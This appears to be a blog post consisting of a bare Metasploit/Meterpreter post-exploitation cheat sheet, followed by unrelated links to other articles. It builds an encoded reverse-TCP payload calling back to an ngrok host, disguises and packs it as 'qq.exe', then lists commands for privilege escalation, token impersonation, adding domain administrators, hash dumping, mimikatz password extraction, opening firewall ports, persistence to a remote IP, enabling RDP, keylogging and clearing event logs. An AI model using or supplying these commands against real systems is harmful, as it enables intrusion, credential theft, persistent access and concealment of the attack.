meterpreter Command Sample

==================================================================================================

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f c

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f exe -o qq.exe

upx - qq.exe -k

==================================================================================================

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.195.45

set lport

set ExitOnSession false

set AutorunScript post/windows/manage/smart_migrate

exploit -j -z

jobs

sessions -i

sysinfo

screenshot

getuid

getsystem

getuid

run post/windows/manage/priv_migrate

background

ps

steal_token PID

drop_token

getuid

use incognito

help incognito

list_tokens -u

list_tokens -g

impersonate_token DOMAIN_NAME\USERNAME

add_user domainuser password -h 192.168.195.191

add_group_user "Domain Admins" domainuser -h 192.168.195.191

run post/windows/gather/smart_hashdump

# http://www.objectif-securite.ch/en/ophcrack.php

use mimikatz

help mimikatz

msv

ssp

kerberos

wdigest

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

run post/windows/gather/checkvm

run post/windows/gather/enum_applications

run post/windows/gather/dumplinks

run post/windows/gather/usb_history

run post/windows/gather/enum_devices

execute -f cmd.exe -i -H -t

net user username userpass /add

net localgroup "Administrators" username /add

net user domainuser userpass /add /DOMAIN

net group "Domain Admins" domainuser /add /DOMAIN

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

exit

run metsvc

run persistence -X -i  -p  -r 47.90.92.56

run post/windows/manage/enable_rdp

run getgui -e

run getgui -u username -p userpass

# rdesktop -u username -p userpass server[:port]

clearev

run post/windows/capture/keylog_recorder

==================================================================================================

meterpreter Command Sample的更多相关文章

  1. POJ-1028 Web Navigation 和TOJ 1196. Web Navigation

    Standard web browsers contain features to move backward and forward among the pages recently visited ...

  2. 北大poj- 1028

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 33281   Accepted: 14836 ...

  3. POJ 1028题目描述

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  4. hdu 1509 Windows Message Queue

    题目连接 http://acm.hdu.edu.cn/showproblem.php?pid=1509 Windows Message Queue Description Message queue ...

  5. 小学生玩ACM----优先队列

    思来想去,本人还是觉得,这个优先队列啊,不学不行,怎么说咧?虽说有时候我可以模仿它的功能,但是有的题目会坑的我大放血,况且多学会用一个小东东总不会伤身的撒,何况我是永举不垂的,哦耶,嘿嘿 优先队列嘛就 ...

  6. Web Navigation

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  7. hdoj 1509 Windows Message Queue【优先队列】

    Windows Message Queue Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Ot ...

  8. SOSEx ReadMe

    Quick Ref:--------------------------------------------------bhi [filename] BuildHeapIndex - Builds a ...

  9. POJ-1028(字符串模拟)

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 31906   Accepted: 14242 ...

随机推荐

  1. android 打卡 虚拟定位 sqlite

    1.使用android5.1模拟器 android5.1模拟器使用数据库管理参数文件,6.0及以后的版本使用xml文件管理 2.使用sqlite修改配置文件 3.修改secure库中的android_ ...

  2. Oracle 索引数据字典、基于函数的索引

    user_indexes 字典视图包含了索引名和唯一性, user_ind_columns视图包含了索引名.表名.以及列名 dba_indexes dba_ind_columns 同理 select ...

  3. Oracle Internals Notes Redo Write Triggers

    There are four conditions that cause LGWR to perform a redo write. When LGWR is idle, it sleeps on a ...

  4. bui拍照上传、相册上传注意事项

    1.控制台输入 bui.currentPlatform  可查看工程项目基于什么平台  如:bingotouch 2.如果是 bingotouch , 在 index.js 或者其它配置的地方, 加上 ...

  5. hdu 6134: Battlestation Operational (2017 多校第八场 1002)【莫比乌斯】

    题目链接 比赛时没抓住重点,对那个受限制的“分数求和”太过关心了..其实如果先利用莫比乌斯函数的一个性质把后面那个[gcd(i,j)=1]去掉,那么问题就可以简化很多.公式如下 这和之前做过的一道题很 ...

  6. How To Create/Extend Swap Partition In Linux Using LVM

    https://www.2daygeek.com/how-to-create-extend-swap-partition-in-linux-using-lvm/ BY RAMYA NUVVULA ·  ...

  7. 小米笔记本pro版bios经常找不到硬盘

    自从买了小米笔记本,对小米的印象大大折扣,bios经常找不到硬盘,关机,重启,就好了. 到小米售后,售后说是系统坏了,我说bios里都找不到.他说,系统坏了也会出现这个情况.我说好吧.重做后,没用几天 ...

  8. vue框架搭建--axios使用

    前后端数据交互作为项目最基础需求(静态的除外),同时也是项目中最重要的需求. 本文重点介绍axios如何配合vue搭建项目框架,而axios的详细使用介绍请移步使用说明 1.安装 cnpm insta ...

  9. [USACO14MAR] 破坏Sabotage(二分答案,分数规划)

    题目链接 Solution 去掉中间一段区间 \([l,r]\) 后剩下的平均值可以表示为 : \[\frac{\sum^{n}_{i=1}{v_i}-\sum^{r}_{i=l}{v_i}}{n-( ...

  10. 126B Password[扩展kmp学习]

    题目大意 给你一个字符串,求它的一个子串使得这个子串即使前缀又是后缀又出现在不是前缀且不是后缀的地方 分析 扩展kmp就是定义z[i]表示i~n的子串与整个串的最长公共前缀的长度是z[i] 所以这个题 ...